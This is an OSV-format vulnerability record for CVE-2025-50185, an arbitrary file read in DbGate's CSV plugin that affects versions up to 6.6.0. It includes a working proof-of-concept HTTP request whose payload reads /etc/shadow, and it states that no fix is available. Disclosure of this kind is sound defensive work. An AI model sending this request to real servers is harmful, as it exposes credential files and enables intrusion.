{"id":"CVE-2025-50185","summary":"DbGate allows Unauthorized File Access via CSV Plugin","details":"DbGate is a cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n```\n\nThe request payload:\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\n\nLines of the file being returned:\n![Screenshot From 2025-05-31 
22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)","aliases":["GHSA-7x75-fmx7-q6h9"],"modified":"2026-04-10T05:29:54.210303Z","published":"2025-07-26T03:34:43.481Z","database_specific":{"cna_assigner":"GitHub_M","cwe_ids":["CWE-29"],"osv_generated_from":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/50xxx/CVE-2025-50185.json"},"references":[{"type":"WEB","url":"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/50xxx/CVE-2025-50185.json"},{"type":"ADVISORY","url":"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-50185"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/dbgate/dbgate","events":[{"introduced":"0"},{"last_affected":"0e06d283357effa6271515c6fe300ed348b4e662"}],"database_specific":{"versions":[{"introduced":"0"},{"last_affected":"6.6.0"}]}}],"versions":["list","packages-api-v1.0.6","packages-api-v1.0.7","packages-sqlitree-v1.0.4","packages-tools-v1.0.5","packages-tools-v1.0.6","packages-tools-v1.0.7","packages-tools-v4.0.0-rc-2","packages-tools-v4.0.0-rc.1","packages-tools-v4.1.0-rc.1","packages-types-v1.0.2","v0.0.1","v0.0.2","v0.5.0","v0.5.1","v0.5.3","v0.5.4","v0.5.5","v3.7.0","v3.7.1","v3.7.10","v3.7.11","v3.7.12","v3.7.13","v3.7.14","v3.7.15","v3.7.16","v3.7.17","v3.7.18","v3.7.19","v3.7.2","v3.7.20","v3.7.21","v3.7.22","v3.7.23","v3.7.24","v3.7.25","v3.7.26","v3.7.27","v3.7.28","v3.7.29","v3.7.3","v3.7.30","v3.7.31","v3.7.32","v3.7.33","v3.7.4","v3.7.5","v3.7.6","v3.7.7","v3.7.8","v3.7.9","v3.8.1","v3.8.10","v3.8.11","v3.8.12","v3.8.13","v3.8.14","v3.8.15","v3.8.16","v3.8.17","v3.8.18","v3.8.19","v3.8.2","v3.8.20","v3.8.21","v3.8.22","v3.8.23","v3.8.24","v3.8.25","v3.8.26","v3.8.27","v3.8.28","v3.8.29","v3.8.3","v3.8.30","v3.8.31","v3.8.32","v3.8.33",
"v3.8.34","v3.8.35","v3.8.36","v3.8.37","v3.8.38","v3.8.39","v3.8.4","v3.8.40","v3.8.5","v3.8.6","v3.8.7","v3.8.8","v3.8.9","v3.9.0-beta.1","v3.9.0-beta.2","v3.9.0-beta.3","v3.9.1","v3.9.1-beta.1","v3.9.1-beta.2","v3.9.2","v3.9.2-beta.1","v3.9.3","v3.9.3-beta.1","v3.9.4","v3.9.5","v3.9.5-beta.1","v3.9.5-beta.2","v3.9.6","v3.9.6-alpha.1","v3.9.6-alpha.10","v3.9.6-alpha.11","v3.9.6-alpha.12","v3.9.6-alpha.13","v3.9.6-alpha.14","v3.9.6-alpha.2","v3.9.6-alpha.3","v3.9.6-alpha.4","v3.9.6-alpha.5","v3.9.6-alpha.6","v3.9.6-alpha.7","v3.9.6-alpha.9","v3.9.6-beta.1","v3.9.6-beta.2","v3.9.6-beta.3","v3.9.6-beta.4","v3.9.6-beta.5","v3.9.6-beta.6","v3.9.6-beta.7","v4.0.0","v4.0.0-beta.1","v4.0.0-beta.2","v4.0.0-beta.3","v4.0.0-beta.4","v4.0.0-beta.5","v4.0.1","v4.0.2","v4.0.3-beta.1","v4.1.0","v4.1.0-beta.1","v4.1.0-beta.2","v4.1.1","v4.1.1-beta.1","v4.1.1-beta.2","v4.1.1-beta.3","v4.1.10-beta.1","v4.1.10-beta.2","v4.1.10-beta.3","v4.1.10-beta.4","v4.1.10-beta.5","v4.1.2","v4.1.3","v4.1.4","v4.1.4-beta.1","v4.1.5","v4.1.5-beta.1","v4.1.5-beta.2","v4.1.6","v4.1.7","v4.1.8","v4.1.8-beta.1","v4.1.9","v4.1.9-beta.1","v4.2.0","v4.2.0-beta.1","v4.2.0-beta.10","v4.2.0-beta.2","v4.2.0-beta.3","v4.2.0-beta.5","v4.2.0-beta.6","v4.2.0-beta.7","v4.2.0-beta.8","v4.2.0-beta.9","v4.2.1-beta.1","v4.2.3","v4.2.3-beta.1","v4.2.3-beta.10","v4.2.3-beta.11","v4.2.3-beta.2","v4.2.3-beta.3","v4.2.3-beta.7","v4.2.3-beta.8","v4.2.3-beta.9","v4.2.4","v4.2.4-beta.1","v4.2.4-beta.3","v4.2.4-beta.4","v4.2.5-beta.1","v4.2.5-beta.2","v4.3.0-beta.1","v4.3.0-beta.2","v4.3.0-beta.3","v4.3.0-beta.4","v4.3.0-beta.5","v4.3.0-beta.6","v4.3.0-beta.7","v4.3.0-beta.8","v4.4.0","v4.4.0-alpha.1","v4.4.0-alpha.2","v4.4.0-beta.1","v4.4.0-beta.2","v4.4.0-beta.3","v4.4.0-beta.4","v4.4.1","v4.4.1-beta.1","v4.4.1-beta.2","v4.4.1-beta.3","v4.4.1-beta.4","v4.4.2","v4.4.2-beta.1","v4.4.2-beta.2","v4.4.2-beta.3","v4.4.2-beta.4","v4.4.3","v4.4.3-beta.1","v4.4.3-beta.2","v4.4.3-beta.3","v4.4.3-beta.4","v4.4.4","v4.4.4-beta.1","v4.4
.4-beta.2","v4.4.4-beta.3","v4.4.4-beta.4","v4.4.5-beta.1","v4.4.5-beta.2","v4.5.0","v4.5.0-beta.1","v4.5.0-beta.2","v4.5.0-beta.3","v4.5.0-beta.4","v4.5.1","v4.5.1-beta.1","v4.5.1-beta.2","v4.5.1-beta.3","v4.6.0","v4.6.1","v4.6.1-beta.1","v4.6.1-beta.2","v4.6.1-beta.3","v4.6.2","v4.6.2-beta.1","v4.6.2-beta.2","v4.6.2-beta.4","v4.6.3","v4.6.3-beta.1","v4.6.3-beta.2","v4.6.4-beta.1","v4.6.4-beta.2","v4.6.4-beta.3","v4.6.4-docker.4","v4.6.4-docker.5","v4.7.0","v4.7.0-beta.1","v4.7.0-beta.2","v4.7.0-beta.3","v4.7.0-beta.4","v4.7.1","v4.7.1-beta.6","v4.7.1-beta.8","v4.7.1-docker.1","v4.7.1-docker.2","v4.7.1-docker.7","v4.7.2","v4.7.2-beta.2","v4.7.2-beta.3","v4.7.2-docker.1","v4.7.3","v4.7.3-alpha.2","v4.7.3-alpha.3","v4.7.3-alpha.5","v4.7.3-beta.1","v4.7.3-beta.4","v4.7.3-beta.6","v4.7.3-beta.7","v4.7.3-beta.8","v4.7.4","v4.7.4-alpha.1","v4.7.4-alpha.10","v4.7.4-alpha.12","v4.7.4-alpha.14","v4.7.4-alpha.15","v4.7.4-alpha.16","v4.7.4-alpha.2","v4.7.4-alpha.3","v4.7.4-alpha.7","v4.7.4-alpha.8","v4.7.4-beta.11","v4.7.4-beta.13","v4.7.4-beta.17","v4.7.4-beta.4","v4.7.4-beta.5","v4.7.4-beta.6","v4.7.4-beta.9","v4.7.5-beta.1","v4.8.0","v4.8.0-beta.1","v4.8.1","v4.8.1-beta.1","v4.8.2","v4.8.2-beta.1","v4.8.2-beta.2","v4.8.3","v4.8.3-beta.1","v4.8.3-beta.2","v4.8.3-beta.3","v4.8.4","v4.8.4-beta.1","v4.8.4-beta.7","v4.8.4-beta.8","v4.8.5","v4.8.6","v4.8.7","v4.8.7-beta.1","v4.8.7-beta.2","v4.8.8","v4.8.8-beta.1","v4.8.8-beta.2","v4.8.8-beta.3","v4.8.8-beta.4","v4.8.8-beta.5","v4.8.8-beta.6","v4.8.9-beta.1","v5.0.1","v5.0.1-beta.1","v5.0.2-beta.1","v5.0.2-beta.2","v5.0.3","v5.0.3-beta.1","v5.0.3-beta.2","v5.0.3-beta.3","v5.0.3-beta.4","v5.0.3-beta.5","v5.0.4-alpha.2","v5.0.4-alpha.7","v5.0.4-alpha.8","v5.0.4-beta.3","v5.0.4-beta.4","v5.0.4-beta.5","v5.0.4-beta.6","v5.0.4-beta.9","v5.0.5","v5.0.6","v5.0.6-alpha.2","v5.0.6-beta.1","v5.0.6-beta.3","v5.0.6-beta.5","v5.0.6-beta.6","v5.0.7","v5.0.7-beta.1","v5.0.7-beta.2","v5.0.7-beta.3","v5.0.7-beta.4","v5.0.7-beta.5","v5.0.8","v5.0.
8-beta.1","v5.0.8-beta.2","v5.0.8-beta.3","v5.0.8-beta.4","v5.0.9","v5.0.9-beta.1","v5.1.0","v5.1.0-beta.4","v5.1.1","v5.1.1-beta.1","v5.1.1-beta.2","v5.1.1-beta.3","v5.1.1-beta.4","v5.1.1-beta.5","v5.1.2","v5.1.2-beta.1","v5.1.2-beta.2","v5.1.2-beta.3","v5.1.2-beta.4","v5.1.2-beta.5","v5.1.3","v5.1.3-beta.1","v5.1.3-beta.2","v5.1.4","v5.1.4-beta.10","v5.1.4-beta.11","v5.1.4-docker.1","v5.1.4-docker.2","v5.1.4-docker.3","v5.1.4-docker.4","v5.1.4-docker.5","v5.1.4-docker.6","v5.1.4-docker.7","v5.1.4-docker.8","v5.1.4-docker.9","v5.1.5","v5.1.6","v5.1.6-beta.1","v5.1.6-beta.2","v5.1.6-beta.3","v5.1.6-beta.4","v5.1.6-beta.5","v5.1.6-beta.6","v5.1.6-beta.7","v5.1.7-alpha.13","v5.1.7-alpha.14","v5.1.7-beta.10","v5.1.7-beta.11","v5.1.7-beta.12","v5.1.7-beta.2","v5.1.7-beta.3","v5.1.7-beta.4","v5.1.7-beta.5","v5.1.7-beta.6","v5.1.7-beta.7","v5.1.7-beta.8","v5.1.7-beta.9","v5.2.0","v5.2.1","v5.2.1-beta.1","v5.2.1-beta.2","v5.2.1-beta.3","v5.2.10-beta.1","v5.2.10-beta.4","v5.2.2","v5.2.2-alpha.11","v5.2.2-alpha.12","v5.2.2-alpha.13","v5.2.2-beta.2","v5.2.2-beta.3","v5.2.2-beta.4","v5.2.2-beta.5","v5.2.2-beta.7","v5.2.2-beta.8","v5.2.2-beta.9","v5.2.3","v5.2.3-beta.1","v5.2.3-beta.2","v5.2.3-beta.3","v5.2.3-beta.4","v5.2.3-beta.5","v5.2.3-beta.6","v5.2.3-beta.9","v5.2.4","v5.2.4-alpha.1","v5.2.5","v5.2.5-beta.16","v5.2.5-beta.17","v5.2.6","v5.2.6-beta.2","v5.2.6-beta.6","v5.2.6-beta.7","v5.2.6-beta.8","v5.2.6-beta.9","v5.2.7","v5.2.7-alpha.1","v5.2.7-beta.1","v5.2.7-beta.2","v5.2.8","v5.2.8-beta.1","v5.2.8-beta.11","v5.2.8-beta.12","v5.2.8-beta.17","v5.2.8-beta.23","v5.2.8-beta.24","v5.2.8-beta.7","v5.2.8-beta.9","v5.2.9","v5.2.9-beta.1","v5.2.9-beta.2","v5.2.9-beta.3","v5.2.9-beta.4","v5.2.9-beta.5","v5.2.9-beta.6","v5.3.0","v5.3.1","v5.3.1-beta.1","v5.3.1-beta.2","v5.3.1-beta.3","v5.3.2-beta.1","v5.3.2-beta.2","v5.3.2-beta.3","v5.3.2-pro.4","v5.3.3","v5.3.4","v5.3.4-beta.1","v5.3.5-beta.1","v5.3.5-beta.10","v5.3.5-beta.11","v5.3.5-beta.12","v5.3.5-beta.13","v5.3.5-beta.2","
v5.3.5-beta.23","v5.3.5-beta.24","v5.3.5-beta.3","v5.3.5-pro.14","v5.3.5-pro.15","v5.3.5-pro.16","v5.3.5-pro.17","v5.3.5-pro.18","v5.3.5-pro.19","v5.3.5-pro.20","v5.3.5-pro.21","v5.3.5-pro.22","v5.4.0","v5.4.1","v5.4.1-beta.1","v5.4.1-beta.2","v5.4.2-beta.7","v5.4.2-pro.1","v5.4.2-pro.2","v5.4.2-pro.3","v5.4.2-pro.5","v5.4.2-pro.6","v5.4.4","v5.4.4-beta.1","v5.4.4-beta.11","v5.4.4-beta.12","v5.4.4-beta.2","v5.4.4-beta.3","v5.4.4-premium-beta.5","v5.4.5-beta.11","v5.4.5-beta.13","v5.4.5-beta.14","v5.4.5-beta.15","v5.4.5-beta.6","v5.4.5-beta.7","v5.4.5-premium-beta.12","v5.5.1","v5.5.2","v5.5.3","v5.5.3-beta.1","v5.5.3-beta.3","v5.5.3-beta.4","v5.5.4","v5.5.4-alpha.1","v5.5.4-alpha.2","v5.5.4-alpha.3","v5.5.4-alpha.4","v5.5.4-alpha.7","v5.5.4-alpha.8","v5.5.4-beta.10","v5.5.4-beta.5","v5.5.4-premium-beta.6","v5.5.4-premium-beta.9","v5.5.5","v5.5.5-beta.3","v5.5.5-premium-beta.1","v5.5.5-premium-beta.2","v5.5.5-premium-beta.4","v5.5.5-premium-beta.5","v5.5.6","v5.5.6-beta.1","v5.5.6-beta.11","v5.5.6-beta.3","v5.5.6-beta.4","v5.5.6-premium-beta.10","v5.5.6-premium-beta.2","v5.5.6-premium-beta.5","v5.5.6-premium-beta.6","v5.5.6-premium-beta.7","v5.5.6-premium-beta.8","v5.5.6-premium-beta.9","v5.5.7-alpha.16","v5.5.7-alpha.25","v5.5.7-alpha.26","v5.5.7-alpha.27","v5.5.7-alpha.28","v5.5.7-alpha.29","v5.5.7-alpha.52","v5.5.7-alpha.53","v5.5.7-alpha.60","v5.5.7-alpha.68","v5.5.7-beta.14","v5.5.7-beta.15","v5.5.7-beta.22","v5.5.7-beta.54","v5.5.7-beta.55","v5.5.7-beta.56","v5.5.7-beta.57","v5.5.7-beta.58","v5.5.7-beta.59","v5.5.7-beta.61","v5.5.7-beta.62","v5.5.7-beta.63","v5.5.7-beta.64","v5.5.7-beta.66","v5.5.7-beta.67","v5.5.7-beta.69","v5.5.7-packer-beta.1","v5.5.7-packer-beta.17","v5.5.7-packer-beta.18","v5.5.7-packer-beta.19","v5.5.7-packer-beta.2","v5.5.7-packer-beta.20","v5.5.7-packer-beta.21","v5.5.7-packer-beta.3","v5.5.7-packer-beta.4","v5.5.7-packer-beta.6","v5.5.7-packer-beta.7","v5.5.7-packer.17","v5.5.7-premium-beta.23","v5.5.7-premium-beta.24","v5.5.7-premium-
beta.65","v6.0.0","v6.0.0-alpha.1","v6.0.0-beta.3","v6.0.0-beta.4","v6.0.0-premium-beta.2","v6.0.0-premium-beta.5","v6.0.0-premium-beta.6","v6.0.1-beta.3","v6.0.1-beta.4","v6.0.1-beta.5","v6.0.1-beta.6","v6.0.1-packer-beta.1","v6.0.1-packer-beta.2","v6.1.0","v6.1.1","v6.1.1-beta.1","v6.1.2","v6.1.2-beta.1","v6.1.2-beta.10","v6.1.2-beta.11","v6.1.2-beta.12","v6.1.2-beta.13","v6.1.2-beta.17","v6.1.2-beta.2","v6.1.2-beta.3","v6.1.2-beta.4","v6.1.2-beta.5","v6.1.2-beta.6","v6.1.2-beta.7","v6.1.2-beta.8","v6.1.2-beta.9","v6.1.2-premium-beta.14","v6.1.2-premium-beta.15","v6.1.2-premium-beta.16","v6.1.2-premium-beta.18","v6.1.3","v6.1.3-beta.2","v6.1.3-premium-beta.4","v6.2.1","v6.2.1-beta.1","v6.2.1-beta.3","v6.2.1-beta.4","v6.2.1-beta.5","v6.2.1-beta.8","v6.2.1-premium-beta.11","v6.2.1-premium-beta.2","v6.2.1-premium-beta.6","v6.2.1-premium-beta.7","v6.2.1-premium-beta.9","v6.2.2-beta.10","v6.2.2-packer-beta.2","v6.2.2-packer-beta.3","v6.2.2-packer-beta.4","v6.2.2-packer.1","v6.2.2-premium-beta.5","v6.2.2-premium-beta.6","v6.2.2-premium-beta.7","v6.2.2-premium-beta.8","v6.2.2-premium-beta.9","v6.3.2","v6.3.2-beta.1","v6.3.2-beta.2","v6.3.2-premium-beta.3","v6.3.2-premium-beta.4","v6.3.3","v6.3.3-premium-beta.1","v6.3.3-premium-beta.2","v6.3.4-beta.2","v6.3.4-beta.4","v6.3.4-premium-beta.1","v6.3.4-premium-beta.3","v6.3.4-premium-beta.5","v6.4.0","v6.4.1","v6.4.1-beta.2","v6.4.2","v6.4.2-beta.1","v6.4.2-premium-beta.2","v6.4.2-premium-beta.3","v6.4.3-alpha.1","v6.4.3-beta.3","v6.4.3-beta.8","v6.4.3-beta.9","v6.4.3-premium-beta.10","v6.4.3-premium-beta.4","v6.4.3-premium-beta.5","v6.4.3-premium-beta.6","v6.4.3-premium-beta.7","v6.5.0","v6.5.1","v6.5.1-beta.1","v6.5.2","v6.5.2-premium-beta.1","v6.5.3","v6.5.3-premium-beta.1","v6.5.4","v6.5.4-premium-beta.1","v6.5.5","v6.5.5-premium-beta.1","v6.5.5-premium-beta.2","v6.5.5-premium-beta.3","v6.5.5-premium-beta.4","v6.5.5-premium-beta.5","v6.5.6","v6.5.6-beta.2","v6.5.6-premium-beta.1","v6.5.6-premium-beta.4","v6.5.6-premium-be
ta.5","v6.5.7-beta.5","v6.5.7-premium-beta.1","v6.5.7-premium-beta.2","v6.5.7-premium-beta.3","v6.5.7-premium-beta.6","v6.6.0"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-50185.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"}]}